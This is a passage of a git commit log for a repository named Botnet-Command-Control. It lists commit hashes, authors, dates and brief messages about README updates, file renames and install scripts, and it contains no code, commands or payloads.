Date:   Tue Apr 7 15:44:00 2020 -0400

    Update install.sh

commit fb21ebbbf2ebcc5239edc6e0c3269e4235bebdf1
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 11:41:38 2020 -0700

    updating repo

commit 3004af9120aefc41bacbf19ee84c73e0c4de599a
Merge: e88493d cf1a2a3
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 11:24:15 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Botnet-Command-Control

commit e88493d8540c23b2690bfc4034c712c778a34689
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 11:23:50 2020 -0700

    updating repo

commit cf1a2a3f8313caa1feae9b2f5ae763923bfbc93f
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:21:17 2020 -0400

    Update README.md

commit 844b963de924c8f95a650d01cb6f5dba3a5cdd85
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:18:54 2020 -0400

    Rename scripts/ss.py to scripts/net/ss.py

commit 36bfde7893fbf30d924f8c600e2924a3bfc1faa3
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:18:40 2020 -0400

    Rename scripts/cc.py to scripts/net/cc.py

commit af9dea2662c1a8a902f90132f8606ca944f5bb17
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:08:27 2020 -0400

    Update README.md

commit 7e6637ddecfa8d907fc940f25689d37be6ffc5ff
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:07:10 2020 -0400

    Update README.md

commit 708f523d4ee42328ca2a957ac0dd7b88409672fe
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:06:09 2020 -0400

    Update README.md

commit 33721255da14988c327baf1f683a340cbff1f6f1
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:05:35 2020 -0400

    Update README.md

commit 70e29a2f62ea2d9afb33dab7f196b6e300f64ecd
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:04:55 2020 -0400

    Update README.md

commit ad73c1823b78564258d5fa8f05e522108b6f3b58
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:04:34 2020 -0400

    Update README.md

commit 69b1f7d239c145aa106c1a53f887a5ec2c2d4e8e
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 09:04:21 2020 -0400

    Update README.md

commit d6f6a63f2eaf99d69dd9bf254b7d8c9988befb77
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:55:55 2020 -0400

    Rename dependencies.sh to install.sh

commit 309be24cc1fb982ebb8fcfec822891275bb7f7a9
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:53:24 2020 -0400

    Rename scripts/install.sh to scripts/install/install.sh

commit f983ff78343f05987afb9c6fdf6f7eb1371c39df
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:53:10 2020 -0400

    Rename scripts/install.ps1 to scripts/install/install.ps1

commit b4d64a800900f96f5f2d6487f0c867dc376edbc0
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:52:37 2020 -0400

    Update dependencies.sh

commit 5ba56525f35e411dd8e5b354e121a41dc048441d
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:52:17 2020 -0400

    Update README.md

commit e6187606f1cf455704a66c1827f8ee132610e81f
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:43:13 2020 -0400

    Create dependencies.sh

commit f78490f583c02bb1685464d4a7d1188fc33e2a9e
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:39:58 2020 -0400

    Update README.md

commit f34f3d96b0343a8e3d51602a680ff277dc7b7d33
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:37:54 2020 -0400

    Update README.md

commit 145d294d6b020f945f98bc8135dbe6e6d918c611
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:36:10 2020 -0400

    Update README.md

commit 1d2afc708166004d21845dd6ff8d5acc4b59d771
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:35:49 2020 -0400

    Update README.md

commit a275241296950ed58ad20335af8e6ef9c4e6e31a
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Tue Apr 7 08:15:05 2020 -0400

    Update README.md

commit 2e714b142475553a68fff9eb56a2a07c4a7f2b4e
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 08:14:17 2020 -0700

    updating repo

commit 2d91e9c7306a70c7e4182a424a12660dee67d4fc
Merge: d426572 4cd2495
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 08:12:41 2020 -0700

    Merge branch 'master' of https://github.com/binexisHATT/Botnet-Command-Control

commit d4265726235fba0432330b533ffebd31a1c285f8
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Tue Apr 7 08:12:09 2020 -0700

    updating repo

commit d44e4e4da828b418d92f271b9d6a4cd4e44154ec
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 6 23:32:04 2020 -0700

    updating repo

commit 4cd2495dfec62fc0e3955f7b5150f7b8fd6d333d
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 6 23:33:26 2020 -0400

    Update cc.py

commit 9febd5be347aeaadefa2a0912c94e47f5c6126d2
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 6 23:28:34 2020 -0400

    Update cc.py

commit e10357eb07a1a96476dc492949f10f948289c0ea
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 6 20:25:31 2020 -0700

    Update ss.py

commit ec42f6dc982f81d590cfaad51c5a2a9c2647fb5b
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 6 23:23:45 2020 -0700

    updating repo

commit cd3271cb49eb84b1ecda65a5940aebf339bc71e1
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 6 23:12:59 2020 -0700

    updating repo

commit 886ba96b0a3cf1eca3603d415ddc6b0e4bfbdb2e
Author: Chris <ckortbaoui@gmail.com>
Date:   Mon Apr 6 22:56:10 2020 -0400

    Update install.sh

commit 9a24d304bc0f22683b136debdade8bfffbb58c0d
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 6 21:58:47 2020 -0400

    Create install.ps1

commit 69d2b760fe17e73e550bab66d46cbb8c33c8b3b3
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 6 21:58:38 2020 -0400

    Create install.sh

commit 0ed02e2f1056638bc7275dbd5f1fdfe6ac3ddf47
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 6 20:07:38 2020 -0700

    updating repo

commit e8d9d0fd0b76ce91bfb84e3ce707ead65faea797
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 6 19:58:37 2020 -0700

    updating repo

commit 276caad6b3b34a6af0fc450efc956b66ef157714
Author: Alexis Rodriguez <rodriguez10011999@gmail.com>
Date:   Mon Apr 6 18:32:21 2020 -0400

    updating repo

commit e3cb780e6982d74b6f71182f32de9e3a6a159c45
Author: Alexis Rodriguez <44281620+binexisHATT@users.noreply.github.com>
Date:   Mon Apr 6 15:48:57 2020 -0400

    Initial commit
